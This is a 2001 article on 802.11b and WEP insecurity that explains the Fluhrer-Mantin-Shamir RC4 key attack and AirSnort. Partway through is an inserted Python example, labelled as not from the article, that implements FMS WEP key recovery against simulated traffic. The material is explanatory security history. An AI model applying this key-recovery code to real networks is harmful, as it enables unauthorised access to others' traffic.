Exploiting and Protecting 802.11b Wireless Networks

http://www.extremetech.com/print_article/0,3428,a%253D13880,00.asp

September 4, 2001
By: Craig Ellison


How many network administrators do you think would allow a complete stranger
to walk into their wiring closet and plug a notebook into the company's
network? Not too many, I suspect. But that's what's happening to companies
coast-to-coast. Well, not exactly. Strangers aren't plugging into networks,
but they are attaching to them using 802.11b wireless network cards, and
that's essentially the same thing.

This year we've seen explosive growth in the deployment of 802.11b networks.
With the huge volume of cards being offered by close to 100 vendors, prices
have plummeted to sub-$100 for notebook cards, and as low as $150 for access
points. Physical deployment is extremely simple, for corporations and home
users alike--in fact, probably too simple. All you have to do to install an
access point is take it out of the box, plug it into the wired Ethernet
segment and turn it on. And for corporations, that's the real problem. They
plug an access point into their network, and many times it's behind their
firewall, so anyone within radio range gets the equivalent of a port on the
trusted LAN without ever passing through the perimeter.

WECA's Double-Edged Sword
Much of the growth in 802.11b networks could probably be attributed to
WECA--the Wireless Ethernet Compatibility Alliance. WECA has developed an
interoperability standard, named WI-FI (wireless fidelity), and vendors'
products that bear the WI-FI logo must pass a suite of basic
interoperability tests. WECA's goal was interoperability and ease of use,
not security. When people plug in a WI-FI certified access point, it should
work with any other WI-FI certified NIC. From a manufacturer's standpoint,
that makes a lot of sense. Manufacturers really want a good "out of box"
experience for their customers, as it cuts down on product returns. In fact,
according to an industry source, even as easy as it is to install, about 25%
of the networking gear purchased for home use is returned because of the
perceived installation complexity.

WEP is Wide Open
The 802.11b standard includes a provision for encryption called WEP (Wired
Equivalent Privacy), which is built on the RC4 stream cipher. Depending on
the manufacturer and model of the NIC and access point, two levels of WEP are
commonly available: one based on a 40-bit secret key plus a 24-bit
Initialization Vector (also called 64-bit encryption and generally considered
insecure), and one based on a 104-bit key plus the same 24-bit IV (so-called
128-bit encryption). There has been a lot of "buzz" in the computer and
technology press over the last several weeks about the basic insecurity of
WEP. Recently, Scott Fluhrer, Itsik Mantin and Adi Shamir published a paper
titled "Weaknesses in the Key Scheduling Algorithm of RC4". It describes how
an attacker who passively collects frames encrypted under certain weak IVs
can recover the secret WEP key one byte at a time, and the work needed grows
only linearly with the key length, so the 104-bit variant is no real
protection. With the key in hand, an attacker can decrypt the network's
traffic and pose as a legitimate user.
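The following is an added example, not code from the article, from the paper or from AirSnort: a self-contained Python simulation of how the Fluhrer-Mantin-Shamir attack recovers a 40-bit WEP key. It implements RC4 and WEP framing (IV || secret key as the RC4 key, CRC-32 integrity check value), generates constructed traffic under the weak IV family (A+3, 255, X) that the paper identifies, and then, knowing only that every WEP data frame's plaintext begins with the LLC/SNAP byte 0xAA, votes on each key byte from the first keystream byte of the frames whose IV satisfies the "resolved" condition. The secret key, the payload and the captured frames are all constructed for the demonstration, and the depth-first search over the top-voted candidates with an ICV check on a captured frame is this example's own choice, not something the article describes.

```python
# Added example: simulation of the FMS weak-IV attack against 40-bit WEP.
# The key, payload and captured traffic below are all constructed.
import struct
import zlib

# Every WEP data frame's plaintext starts with this LLC/SNAP header, so a
# passive listener knows the first keystream byte: ciphertext[0] XOR 0xAA.
SNAP_HEADER = bytes.fromhex("aaaa030000000800")


def rc4_ksa(key):
    """RC4 key scheduling: returns the permutation S derived from `key`."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n bytes of the RC4 pseudo-random generation phase."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret_key, iv, plaintext):
    """WEP frame body: IV || (plaintext || CRC-32 ICV) XOR RC4(IV || secret_key)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    data = plaintext + icv
    ks = rc4_keystream(iv + secret_key, len(data))
    return iv + bytes(a ^ b for a, b in zip(data, ks))


def wep_decrypt(secret_key, frame):
    """Returns the plaintext, or None if the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + secret_key, len(body))
    data = bytes(a ^ b for a, b in zip(body, ks))
    plaintext, icv = data[:-4], data[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        return None
    return plaintext


def fms_vote(iv, known, z):
    """One FMS observation for secret-key byte A = len(known).

    Runs the first A+3 KSA steps (IV plus the bytes already recovered), checks
    the 'resolved' condition S[1] < A+3 and S[1] + S[S[1]] == A+3, and if it
    holds derives a candidate for key byte A from the first keystream byte z.
    The candidate is right about 5% of the time; wrong ones are spread evenly.
    """
    A = len(known)
    K = iv + known
    S = list(range(256))
    j = 0
    for i in range(A + 3):
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    x = S[1]
    if x >= A + 3 or (x + S[x]) & 0xFF != A + 3:
        return None
    return (S.index(z) - j - S[A + 3]) & 0xFF


def fms_recover(frames, key_len, check_frame, fudge=5):
    """Recover the secret key byte by byte from captured frames.

    The top `fudge` voted candidates for each byte are tried depth-first; a
    full candidate key is accepted only if it decrypts `check_frame` with a
    valid ICV, so a wrong guess can never be returned.
    """
    obs = [(f[:3], f[3] ^ SNAP_HEADER[0]) for f in frames]

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, check_frame) is not None else None
        votes = [0] * 256
        for iv, z in obs:
            cand = fms_vote(iv, prefix, z)
            if cand is not None:
                votes[cand] += 1
        for b in sorted(range(256), key=lambda v: -votes[v])[:fudge]:
            found = search(prefix + bytes([b]))
            if found is not None:
                return found
        return None

    return search(b"")


def simulate_capture(secret_key, payload):
    """Constructed traffic: one frame under each weak IV (A+3, 0xFF, X)."""
    frames = []
    for A in range(len(secret_key)):
        for X in range(256):
            iv = bytes([A + 3, 0xFF, X])
            frames.append(wep_encrypt(secret_key, iv, SNAP_HEADER + payload))
    return frames


if __name__ == "__main__":
    KEY = bytes.fromhex("0badc0ffee")  # constructed 40-bit secret; the attacker never reads it
    captured = simulate_capture(KEY, b"constructed payload")
    found = fms_recover(captured, len(KEY), captured[0])
    print("recovered:", found.hex() if found else "not found")  # 0badc0ffee
```

Run as a script it prints the recovered key. A real passive listener cannot choose IVs; it waits until enough frames with weak IVs have gone by, which is why a tool built on this attack has to capture a large volume of traffic, and a 104-bit key only means waiting for frames in eight more IV families rather than facing a stronger cipher.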

Two weeks ago, a program named AirSnort appeared on the Internet. AirSnort,
which runs on a Linux system with a 2.4 kernel and Prism-based NICs,
implements the attack outlined in the Fluhrer, Mantin and Shamir paper, and
can discover a WEP key after passively monitoring a wireless network.
According to the site (http://airsnort.sourceforge.net), AirSnort can
determine the WEP key in seconds after "listening" to